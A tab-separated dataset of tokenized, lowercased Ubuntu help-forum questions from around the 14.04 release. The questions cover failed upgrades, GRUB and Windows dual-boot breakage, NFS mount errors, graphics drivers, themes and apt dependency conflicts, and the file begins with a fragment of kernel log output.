wlan0 : link is not ready [ 23.211611 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 86.586843 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 277.391415 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 290.307430 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 293.017900 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 475.096690 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready
449665	is upgrading from lts to lts as reliable as doing a fresh install ?	having run into many snags and stability issues when upgrading ( update-manager -d ) from just release to release ( for example : 13.04 - 13.10 ) , i soon learned and have been told that it is always more reliable to just do fresh installs . however , when it comes to lts to lts upgrading ( update-manager -d ) , i was told by a # ubuntu op that this is as reliable as doing a fresh install . i have a hard time understanding how that can be . if just release to release is prone to instability , what makes an lts to lts upgrade any different ? how can it be as reliable as a fresh install ?
449666	ubuntu 12.04 nfs v4 mount error incorrect mount option was specified	i am trying to mount a nfs folder over network from nfs server to nfs client . my nfs server configuration looks like this /mount 192.168.145.128/255.255.255.0 ( rw , sync , no_subtree_check ) 127.0.0.1/255.255.255.0 ( rw , sync , no_subtree_check ) i have installed all required packages ( nfs-kernel-server nfs-common ) on my server . i have also restarted the server using the option : service nfs-kernel-server restart at client end , i check the folder list that i can mount using showmount -e 192.168.145.131 export list for 192.168.145.131 : /mount 127.0.0.1/255.255.255.0,192.168.145.128/255.255.255.0 but when i try mounting the host folder , i get the following error : mount -t nfs -v 192.168.145.131 : /mount mount/ mount.nfs : timeout set for fri apr 18 17:34:44 2014 mount.nfs : trying text-based options 'vers=4 , addr=192.168.145.131 , clientaddr=192.168.145.128' mount.nfs : mount ( 2 ) : invalid argument mount.nfs : an incorrect mount option was specified this is my dmesg output : dmesg | tail [ 24930.733208 ] nfs : bad mount option value specified : vers=4
449668	grub and kernel	i have a simple but important question for my case : does upgrading the grub mean upgrading the kernel ?
449672	usb does not work on reboot 12.04	after a reboot , peripherals in my usb ports do not work . sometimes if i remove them from the computer and put them back in they will work fine . these are not on a hub , but plugged directly into the machine . thank you . gb
449673	windows boot loader does n't work after upgrading to 14.04 from 13.10 ( windows 8.1 dual boot )	i was already running 13.10 alongside windows 8.1 with no problems at all . i upgraded to 14.04 lts yesterday through software updater yesterday and now the windows boot loader on the grub menu does n't work . it just goes black for a second and then returns to the grub menu again . i should probably add that windows was pre-installed , so no dvd . any help would be greatly appreciated . i am a linux newcomer , so go easy on me if this is a really obvious fix . i would get rid of windows entirely but my girlfriend refuses.. thanks .
449674	git strange behaviour	i recently upgraded my ubuntu local server to 14.04 . i do n't know if it 's related with upgrade or not , but things is there was no such problem before . the problem is , googled this problem , and found that , deleting this file will fix problem . removed index.lock file . got error : error : bad signature fatal : index file corrupt tried to git reset . after reset , tried to add , commit and push . first try gone well . it pushed commit without any problem . but second try , again same problem . tried to remove repo and clone again . same problem occurs . tried to chown -r root : root /var/www : no success also tried to chmod -r 777 .git/ of project . same thing any suggestions ? what to do next ?
449677	how do i set the lightdm wallpaper in ubuntu 14.04 ?	in previous versions of ubuntu , picking one of the default wallpapers meant that you saw it on the login screen as well . i am now on a clean install of ubuntu 14.04 , the lightdm wallpaper appears to be set at /usr/share/backgrounds/warty-final-ubuntu.png . it is ignoring anything else . i tried setting a wallpaper by right clicking the desktop and choosing one of the default set ( e.g . the one corresponding to /usr/share/backgrounds/forever_by_shady_s.jpg ) . i then rebooted , but the lightdm wallpaper is still the default purple one . i had a look at the log file at /var/log/lightdm/x-0-greeter.log : [ +0.10s ] debug : background.vala:483 : regenerating backgrounds [ +0.10s ] debug : background.vala:68 : making background /usr/share/backgrounds/warty-final-ubuntu.png at 1920x1200,1440x900 the wiki page appears to be out of date as it is pointing to configuration file locations which no longer exist in 14.04 . i did manage to find some potential config files at /usr/share/lightdm/lightdm.conf.d/ but the files there do n't contain any specific path locations , so i am not sure how to proceed . i am aware of lightdm 's pickiness - so this is about the default wallpapers that come with ubuntu , all have read permissions globally and are n't encrypted or on separate drives .
449680	upgrading from 13.10 to 14.04 broke grub	i have a dual boot ubuntu + windows 8 on an uefi system . everything was ok until i upgraded to ubuntu 14.04 from 13.10 . now what i get when i boot the pc is a grub rescue screen like this with the following : failed to open \efi\microsoft\boot\grubx64.efi - 800000000000000e failed to load image failed to open \efi\microsoft\boot\mokmanager.efi.efi - 800000000000000e failed to load image welcome to grub ! error : symbol 'grub_term_highlight_color ' not found . grub rescue > using boot-repair from a live cd ( either 13.10 or 14.10 ) reports that an error occurred and creates this report : http : //paste2.org/y8mdwa0m ( boot repair says it will install packages from ubuntu 13.10 ) but nothing changes . if i press f12 at the boot i get to a bios screen ( boot menu ) where i can choose from hdd , usb , dvd reader and if i click on the hdd i get three choices : select a device to boot : windows boot manager ubuntu ubuntu the windows option take me back to the grub rescue . with the other two options i get to a grub menu where i am able to start ubuntu but the window option does n't work i do n't know anymore what to do update : thanks for the answers , i actually tried all of them ( reinstalled grub more than 5 times from different versions of ubuntu on usb sticks and used a lot of times boot repair but nothing worked ) at the end i 'm using refind ( http : //www.rodsbooks.com/refind/getting.html ) which is allowing me to get to grub from which i can start ubuntu ( but not windows ) and starting windows on its own using refind menu . but of course it 's not the ideal solution update 2 : i have only one disk : update 3 : this is the error that appears when i try to install grub or run grub-install : installing for i386-pc platform . grub-install : warning : this gpt partition label has no bios boot partition , the embed is not possible . grub-install : warning : this embed is not possible . grub can only be installed in this configuration using blocklist . the blocklist however , are not reliable and it is not recommended to use .. installation completed , no errors reported . generating grub configuration file ... found linux image : / boot/vmlinuz-3.13.0-24-generic found initrd image : / boot/initrd.img-3.13.0-24-generic found linux image : / boot/vmlinuz-3.11.0-19-generic found initrd image : / boot/initrd.img-3.11.0-19-generic found linux image : / boot/vmlinuz-3.11.0-7-generic found initrd image : / boot/initrd.img-3.11.0-7-generic found linux image : / boot/vmlinuz-3.11.0-5-generic found initrd image : / boot/initrd.img-3.11.0-5-generic found linux image : / boot/vmlinuz-3.11.0-4-generic found initrd image : / boot/initrd.img-3.11.0-4-generic found linux image : / boot/vmlinuz-3.11.0-3-generic found initrd image : / boot/initrd.img-3.11.0-3-generic found linux image : / boot/vmlinuz-3.11.0-2-generic found initrd image : / boot/initrd.img-3.11.0-2-generic found windows boot manager on / dev/sda2 @ / efi / microsoft / boot / bootmgfw.efi adding boot menu entry for the efi firmware configuration done ( translated from italian )
449682	rvm /usr/bin/env : ruby no such file error	i 've installed rvm + ruby systemwide . which ruby /usr/local/rvm/rubies/ruby-2.1.1/bin/ruby and : /usr/bin/env : ruby : no such file or directory everything else works fine , putting direct path of ruby in my executables work fine .
449685	flash and java plug-ins in chromium lost after upgrade to 14.04	i 've just upgraded 12.04 to 14.04 . java and flash plug-ins are lost from chromium . i have openjdk7 installed with icedtea and adobe flash plug-in for firefox . sudo cp /usr/lib/flashplugin-installer/libflashplayer.so /usr/lib/chromium-browser/plugins the above command did n't help ! can anyone help me out in setting the plugins .
449687	qml : how to display a `` < `` character in a richtextbox ?	the code in question : description.insert ( 0 , '' < tr > < td > < h1 > -- -less-than-sign-here -- - < /h1 > < /td > < td > < font face='ubuntu'size='3'color= ' # f37420 ' > ignoreme < /font > < /td > < /tr > < tr > < td > < font face='ubuntu mono ' size='3 ' color= ' # 8b0059 ' > ignoreme < /td > < td > ignoreme < /td > < /tr > '' ) trying to place a < in -- -less-than-sign-here -- - has not been displaying anything . i have tried doing an \ < , but that has n't worked either . ideas ?
449691	unable to upgrade to 14.04	i am trying to upgrade from kubuntu 13.10 to 14.04 . when i start the distribution upgrade , i get this message after `` setting new software channels '' : an unresolvable problem occurred while calculating the upgrade [ ... ] after looking on other posts , i have found that this may be due to conflicting packages . so i ran grep broken /var/log/dist-upgrade/apt.log and got this : broken cups-filters : amd64 conflicts on foomatic-filters [ amd64 ] < 4.0.17-1ubuntu1 > ( universe/text ) broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ amd64 ] < 0.9.19-1 > ( libs ) broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ i386 ] < 0.9.19-1 > ( libs ) broken libclutter-1.0-0 : amd64 breaks on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) broken libqt5core5a : amd64 breaks on libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) ( < 5.2.0+dfsg~ ) broken libmuonprivate2 : amd64 breaks on libmuonprivate1 [ amd64 ] < 2.1.3-0ubuntu0.2 > ( kde ) broken libsdl2-2.0-0 : amd64 depends on libwayland-egl1-mesa [ amd64 ] < none - > 10.1.0-4ubuntu5 > ( libs ) ( > = 10.0.2 ) broken libsdl2-2.0-0 : amd64 depends on libwayland-egl1 [ amd64 ] < none > ( none ) broken kde-window-manager : amd64 depends on libwayland-egl1-mesa [ amd64 ] < none - > 10.1.0-4ubuntu5 > ( libs ) ( > = 10.0.2 ) broken kde-window-manager : amd64 depends on libwayland-egl1 [ amd64 ] < none > ( none ) broken kde-workspace : amd64 depends on kde-window-manager [ amd64 ] < 4:4.11.5-0ubuntu0.1 - > 4:4.11.8-0ubuntu6 > ( universe/x11 ) ( > = 4:4.11.8-0ubuntu6 ) broken kde-workspace : amd64 depends on kde-window-manager-active [ amd64 ] < none - > 4:4.11.8-0ubuntu6 > ( universe/x11 ) ( > = 4:4.11.8-0ubuntu6 ) broken ubuntu-drivers-common : amd64 conflicts on jockey-common [ amd64 ] < 0.9.7-0ubuntu15 > ( admin ) broken ubuntu-drivers-common : amd64 conflicts on jockey-common [ i386 ] < none > ( none ) broken ubuntu-drivers-common : amd64 conflicts on jockey-kde [ amd64 ] < 0.9.7-0ubuntu15 > ( admin ) broken ubuntu-drivers-common : amd64 conflicts on jockey-kde [ i386 ] < none > ( none ) broken ocl-icd-libopencl1 : amd64 conflicts on libopencl1 [ amd64 ] < none > ( none ) broken xserver-xorg-input-synaptics : amd64 breaks on kde-config-touchpad [ amd64 ] < 0.8.1-1ubuntu4.1 > ( x11 ) ( < 0.8.1-2~ ) broken wine1.6-i386 : i386 depends on libopencl-1.1-1 [ i386 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken kubuntu-desktop : amd64 depends on kde-window-manager [ amd64 ] < 4:4.11.5-0ubuntu0.1 - > 4:4.11.8-0ubuntu6 > ( universe/x11 ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libcogl-pango12 : amd64 depends on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) ( > = 1.13.4 ) broken libvlccore5 : amd64 depends on vlc-data [ amd64 ] < 2.0.8-1 - > 2.1.2-2build2 > ( universe/graphics ) ( = 2.0.8-1 ) broken libperl5.14 : amd64 depends on perl-base [ amd64 ] < 5.14.2-21build1 - > 5.18.2-2ubuntu1 > ( perl ) ( = 5.14.2-21build1 ) broken wine1.5-i386 : i386 depends on wine1.6-i386 [ i386 ] < 1:1.6.1-0ubuntu1~ppa1 - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140331.5c0623b5-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken wine1.6 : amd64 depends on wine1.6-i386 [ amd64 ] < none > ( none ) ( = 1:1.6.2-0ubuntu4 ) broken wine : amd64 depends on wine1.6 [ amd64 ] < 1:1.6.1-0ubuntu1~ppa1 - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken wine : amd64 depends on wine1.7 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken playonlinux : amd64 depends on wine [ amd64 ] < 1:1.7.16-0ubuntu1~saucy1 > ( universe/otherosfs ) broken playonlinux : amd64 depends on wine-unstable [ amd64 ] < none > ( none ) broken wine1.5 : amd64 depends on wine1.6 [ amd64 ] < 1:1.6.1-0ubuntu1~ppa1 - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140331.5c0623b5-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken wine1.6-amd64 : amd64 depends on wine1.6 : any [ amd64 ] < none > ( none ) ( = 1:1.6.2-0ubuntu4 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken wine1.5-amd64 : amd64 depends on wine1.6-amd64 [ amd64 ] < 1:1.6.1-0ubuntu1~ppa1 - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140331.5c0623b5-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140331.5c0623b5-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-glamoregl [ amd64 ] < 0.6.0+git20140313.a4fbc773-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-radeon [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140317.bdc41204-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140331.5c0623b5-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) do i have to remove all these packages manually before upgrading ? i have xorg-edgers and bumblebee/primus ( for my optimus card ) installed and i do not want to break the system . i have also never had this kind of problems installed and i always use other repos ... what is the solution for this ?
449693	how to change graphic card driver using ubuntu-drivers ?	i would like to verify what driver is used currently for nvidia and then switch the driver to nvidia-331-updates if necessary . how do i accomplish that ? sudo ubuntu-drivers devices == /sys/devices/pci0000:00/0000:00:01.0/0000:01:00.0 == modalias : pci : v000010ded00000ffbsv00001462sd000010dbbc03sc00i00 model : gk107glm [ quadro k2000m ] vendor : nvidia corporation driver : nvidia-331-updates - distro non-free driver : nvidia-304 - distro non-free driver : nvidia-304-updates - distro non-free driver : xserver-xorg-video-nouveau - distro free builtin sudo ubuntu-drivers list nvidia-304 nvidia-331 nvidia-331-updates nvidia-304-updates ( i tried sudo ubuntu-drivers autoinstall and sudo ubuntu-drivers autoinstall nvidia-331-updates - desperatly , in lack of a useful help text - to no avail ) a similar question has been asked recently ( how do you use ubuntu-drivers-common or software-properties in the command line to change graphics drivers ? ) but the asker accepted an answer which does n't really answer the question . that 's why i want to give it another try . the reason why i am interested in this in the first place is because after fiddling around trying to set up a second monitor suddenly the graphical `` additional drivers '' -tool stopped working .
449695	executing *.exe file from mounted iso . no permissions	i 'm trying to run *.exe file from iso that i 've mounted , but i ca n't . wine says `` access denied '' . any ideas how to receive permission to run this file ?
449701	pae installation problem	i run : sudo apt-get install linux-headers-2.6.38.8-42-generic-pae linux-image-2.6.38.8-42-generic-pae -- fix-missing i got these errors : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-headers-2.6.38-42-generic-pae e : could n't find any package by regex 'linux-headers-2.6.38-42-generic-pae' e : unable to locate package linux-image-2.6.38-42-generic-pae e : could n't find any package by regex 'linux-image-2.6.38-42-generic-pae' how can i install that pae version ? when i run lsb_release -d & & dpkg -l|grep linux-image|grep ^ii i get this : ii linux-image-2.6.38-8-generic 2.6.38-8.42 linux kernel image for version 2.6.38 on x86/x86_64 ii linux-image-generic 2.6.38.8.22 generic linux kernel image
449703	do i need to install all the drivers for my laptop ?	i am using hp mini laptop . i am going to replace my windows 7 os with ubuntu . do i need to install all the supporting drivers ( like we do after installing windows ) of my laptop ( graphic , wifi , bluetooth etc. , ) after installing ubuntu ?
449707	not loading unity launcher in ubuntu	i 've recently updated ubuntu to 14.04 and somehow it got messed up in between and i restarted system and from advanced options i fixed packages and installed everything . the issue now is i ca n't able to login into my system with the credentials . issue is not credentials i can login with that in virtual console [ ctrl+alt+f1 ] . when i login as guest it works fine , but using virtual console i tried sudo startx and it is not showing launcher unity menus , ca n't switch between programs ... unity -- reset says deprecated and unity -- reset-icons did n't work . somewhere i got an error ; saned disable , so i changed config and set start=yes . i got ; display is not set and ca n't open display during some process .
449709	network indicator disappeared in lubuntu	i just upgraded to lubuntu 14.04 from 13.10 successufully , via do-release-upgrade . but after reboot , i found that the network indicator has been disappeared , so i can not switch different network connection as before in 13.10 or 12.04 , and can not use vpn by clicking . i tried : add item with name containing 'network ' for indicator bar right below open item in menu with name containing 'network' but none of these is the network indicator ( switcher ) that we use in 13.10 . does 14.04 change to another network indicator ? is there alternative indicator for this , or any command for network switch .
449711	how can i apply exceptions to window decoration on compiz ?	back in the previous releases , i used the compiz plugins `` window decoration '' and `` window rules '' to have a transparent , sticky , unmovable gnome-terminal acting as a wallpaper . the trick was to create a profile with a permanent title ( transparent ) and then use the filter title=transparent and ! title=transparent in the different plugin rules . the result looked like this : after the upgrade , i 've noticed that the window decoration rule no longer applies . aparently , window decorations are now managed by the unity plugin and not the gtk-window-decorator , which i suppose was necessary to create the locally integrated menus . now the terminal looks like this : if i try to force the `` window decoration '' plugin , it asks me to disable the unity plugin , and then all the desktop crashes . so my question is if there 's a workaround to force compiz not to use decorations on this specific window . maybe with some sort of parameter when launching the terminal .
449712	use eduroam to connect to peap and mschapv2	i 'm been using eduroam on my ubuntu-client for the last three years now , and with every new version , there is harder and harder to connect to eduroam ( my university network ) . up until now it has worked with just using peap and mschapv2 , with my university credentials . this time though after endless hours , it 's still not willing to connect . anyone got an idea on how , or even managed to do it them self ? eduroam is on just about all universities in the world , so i guess i 'm not the only ubuntu-user needing this ?
449713	which programs are often heavily affected by an upgrade and which ones are not ?	i am currently upgrading from 12.10 to 13.10 . however , i am in real need of using that computer for ssh connections and as a network-drive on my network at the moment . which programs are often heavily affected by the upgrade-progress and which are not ? because , i was wondering if nautilus might get affected ? i have a file-transfer on 29 gb going on between two computers , and i was stupid enough to not use the copy instead of the move method .
449714	webcam does n't work - ubuntu 14.04 - dell inspiron 14 3421	when i open cheese on terminal - this happend : prtiago @ dell : ~ $ cheese ( cheese:14809 ) : clutter-warning ** : whoever translated default : ltr did so wrongly . ** message : cheese-application.vala:291 : error during camera setup : nenhum dispositivo localizado ( cheese:14809 ) : cheese-critical ** : cheese_camera_device_get_device_node : assertion 'cheese_is_camera_device ( device ) ' failed ( cheese:14809 ) : glib-critical ** : g_variant_new_string : assertion 'string ! = null ' failed ( cheese:14809 ) : glib-gio-critical ** : g_settings_schema_key_type_check : assertion 'value ! = null ' failed ( cheese:14809 ) : glib-critical ** : g_variant_get_type_string : assertion 'value ! = null ' failed ( cheese:14809 ) : glib-gio-critical ** : g_settings_set_value : key 'camera ' in 'org.gnome.cheese ' expects type 's ' , but a gvariant of type ' ( null ) ' was given ** ( cheese:14809 ) : critical ** : cheese_preferences_dialog_setup_resolutions_for_device : assertion 'device ! = null ' failed webcam and mic does n't work - in the 13.10 work fine , after migrate to 14.04 they stop ! any solution ?
449715	will window 's check disk hurt my ext partition ?	i 'm a bit worried , my windows8 started a check and repair disk when i booted . it has n't done this since i installed lubuntu , is windows going to destroy my linux because it is an unrecognized file system ?
449717	icon themes not fully applied	i 'm running ubuntu 14.04 lts . i 've installed faenza icons ( version 1.3.1 ) and used the latest ubuntu tweak to apply the theme . however , faenza icons are not fully applied and i can still see some icons have their old , system default appearance . how can i fix this ? screenshot example : you can see in the screenshot here the icons for displays , power , time & date , and sound are stuck with ubuntu 's system default ones , and i do n't want that .
449719	ca n't start an application from the launcher , but can from dash and rightcliking	after i started an application and stopped it i can not launch that application again by clicking on the launcher icon . nothing would happen . i can however launch that application through the dash or , right clicking on the launcher icon and choosing `` new window '' ( firefox for instance ) . that problem seems to appear for all apps in the launcher , like system settings , nautilus , firefox . do you know how to fix that behavior ?
449723	how can i use metacity and its themes with unity ?	according to https : //wiki.ubuntu.com/unity/theming now trusty do n't support metacity themes . so ... is there a another way to enable metacity in unity ? for example , gnome-session-flashback can return a desktop with gnome-metacity . any similar tool but for unity ?
449724	suspend not working due to backlight issue	i am using the radeon hd 6320 video card with the radeon xorg driver . i have tried using the flgrx dirver but it is n't as snappy as the xorg and also has brightness issues . the xorg driver has issues with suspend thought and i believe i have tracked it down to a backlight issue . i have used pm-suspend and everything comesback on except for the screen . any suggestions on how to fix this issue ?
449729	windows removed from grub after installation of ubuntu 14.04	i just installed ubuntu 14.04 flawlessly -- i 'm happy with that . but when after several restart , i realized something was missing from my grub : it was my windows boot option how to make it appear again in my grub loader ?
449731	kde theme broken after 13.10 → 14.04 upgrade	i just did the upgrade from 13.10 to 14.04 and the default kde theme not looks like no theme at all : i usually use kde with awesome wm as the window manager , but even without awesome wm , this looks bad . as far as i can tell , all oxygen packages that i could possibly need are installed : i gtk2-engines-oxygen - widget-thema oxygen für gtk+-anwendungen p gtk2-engines-oxygen : i386 - widget-thema oxygen für gtk+-anwendungen i gtk3-engines-oxygen - oxygen widget theme for gtk3-based applications p gtk3-engines-oxygen : i386 - oxygen widget theme for gtk3-based applications i kde-style-oxygen - oxygen widget style p kde-style-oxygen : i386 - oxygen widget style i libreoffice-style-oxygen - office productivity suite -- oxygen symbol style i oxygen-cursor-theme - oxygen mouse cursor theme p oxygen-cursor-theme-extra - oxygen mouse cursor theme - extra colors i oxygen-icon-theme - oxygen icon theme p oxygen-icon-theme-complete - oxygen icon theme - transitional package p oxygen-molecule - gtk+ theme to match the oxygen widget style i ttf-oxygen-font-family - oxygen font family p ttf-oxygen-font-family : i386 - oxygen font family in the systemsettings , it does not show oxygen : how can i get the oxygen theme back ?
449732	install maas when i ca n't control the existing dhcp server	i 'm a graduate student and i 'm trying to install maas to manage the servers in my lab . the document of maas and maas itself is awesome , but i still have a question about dhcp configuration . so there is already a dhcp server in our lab 's network but i ( and my lab ) has no control of it . so neither could i set up a dhcp with maas nor could i manually change the configuration of the dhcp server to allow maas automatically add new node . i can live with adding the node manually by the mac address . so my question is if i add all nodes manually , can i install maas without any control of the dhcp server ?
449739	ca n't install software due to `` authentication service is not available '' error	yesterday i installed lubuntu 14.04 alternative iso on an old xp laptop . the partition and install went well . there are , however some issues with security , or my ability to add users and software . i installed the software center from the aptitude package manager , which went ok , but i can not download software due to insufficient privilege . authentication error , software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.28 ' } ) : org.debian.apt.install-or-remove-packages i did download firefox successfully using terminal . i wanted to add users so did a sudo for gnome-system-tools , which installed , but i can not add users nor update software due to lack of authentication . for example the software updater says : you are not allowed to perform this action . you do n't have the required privileges to perform this action . all the issues seem to indicate that lubuntu does not have sufficient privileges to update software/users , but i am logged on as the one and only user and therefore admin person . please tell me what i did wrong . the old dell laptop does work much faster and better than using xp . thanks . addendum friday april 18 2014 so i tried to reinstall lubuntu 14.04 lts alternative iso from scratch from my usb . i realized that though i configured my dell inspiron 6000 500m ram to boot from usb , when i selected `` install lubuntu '' i would get to an install step where it asked me to mount the cd-rom . as i was using a usb i was forced to abort the install . instead i burned a lubuntu 14.04 lts alternative iso cd and installed from it . while the laptop still booted from the usb when the install asked to mount the cd i provided the install cd and the install was successful . firefox was provided default and runs well . using the synaptic package manager i installed chromium , which runs like a dog . summary : lubuntu 14.04 lts alternative iso will only install using a cd for my old laptop . thank you all for your help .
449740	kubuntu 14.04 : i686 version to run on win8 64bit laptop ?	am existing kubuntu user . i am about to install kubuntu 14.04 on a new ( ish ) dell inspirion 17 7000 . its currently running windows 8.0 64bit , so i presume its in uefi mode . i 'd like to keep win8 on it in case i ever need to run an odd program that needs windows . looking at the ubuntu wiki : it tells me that i need to install a 64bit version of ubuntu , kubuntu in my case . ( https : //help.ubuntu.com/community/uefi ) . i look at the kubuntu flavours available on the download site it only gives me the i386 & amd64 versions ( http : //cdimage.ubuntu.com/kubuntu/releases/trusty/release/ ) . ubuntu does have a i686 version available . so i am a little stuck . any suggestions please ? cheers , thanks andy
449741	ca n't upgrade past 11.10 - libc6 dependency errors	since upgrading to 11.10 i ca n't upgrade any further ( trying to get my web server to latest version . ) i 'm aware of how do i resolve unmet dependencies ? and have tried up to the point of running this : apt-get remove -- dry-run libc6 ..but the output is scary and i 'm worried about removing this package or at least until i understand what i 'm doing better . here is the output of apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . libc-dev-bin : depends : libc6 ( > 2.15 ) but 2.13-20ubuntu5.3 is installed libc6 : depends : libc-bin ( = 2.13-20ubuntu5.3 ) but 2.15-0ubuntu20.2 is installed libc6-dev : depends : libc6 ( = 2.15-0ubuntu20.2 ) but 2.13-20ubuntu5.3 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu11 ) but 1.0.3-4ubuntu2 is installed e : unmet dependencies . try using -f. obviously i 've done what it says to no avail . can anyone suggest a safe way to fix these issues ? ultimately i 'm trying to get my web server to the latest version of ubuntu so maybe there 's a way to bypass this . note that i have command line access only . i 've got a few live websites there that are easily backed up but otherwise nothing too critical . thanks in advance for any help . rob
449742	sudo apt-get update error ( almost tried every solution on internet )	w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/gtk3/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . when i install any package then i get an error e : unable to locate package win2-7 plz tell me what to do . almost tried every solution on internet .
